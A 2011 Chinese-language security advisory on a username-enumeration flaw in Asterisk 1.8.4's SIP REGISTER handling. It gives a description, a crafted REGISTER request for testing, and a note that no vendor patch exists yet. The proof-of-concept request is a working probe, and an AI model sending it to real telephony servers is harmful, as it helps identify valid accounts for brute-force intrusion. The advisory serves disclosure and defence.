Asterisk SIP "REGISTER"请求用户枚举漏洞
发布日期:2011-05-26
更新日期:2011-05-26
受影响系统:Asterisk Asterisk 1.8.4 1
描述:
BUGTRAQ ID:
48008
Asterisk是一款实现电话用户交换机(PBX)功能的自由软件、开源软件。Asterisk提供完善PBX功能,可以连接多种不同的电话终端,包括普通电话机,IP电话机,软电话等,支持多种主流的IP电话协议和系统接口。
Asterisk在实现上存在SIP "REGISTER"请求用户枚举漏洞,远程攻击者可利用此漏洞获取有效的用户名,导致野蛮攻击。
在REGISTER消息中使用有效的或无效的用户名时发送了不同的请求,通过发送特制的REGISTER消息确定有效的用户名。
<*来源:Francesco Tornieri
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
REGISTER sip:192.168.2.1 SIP/2.0
CSeq: 123 REGISTER
Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:500@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 2e2f07e0499cec3abf7045ef3610f0f2
To: <sip:500@192.168.2.1>
Refer-To: sip:500@192.168.2.1
Contact: <sip:500@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 28000
Max-Forwards: 70
建议:
厂商补丁:
Asterisk
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://downloads.asterisk.org/pub/security/浏览次数:2900
严重程度:0(网友投票)
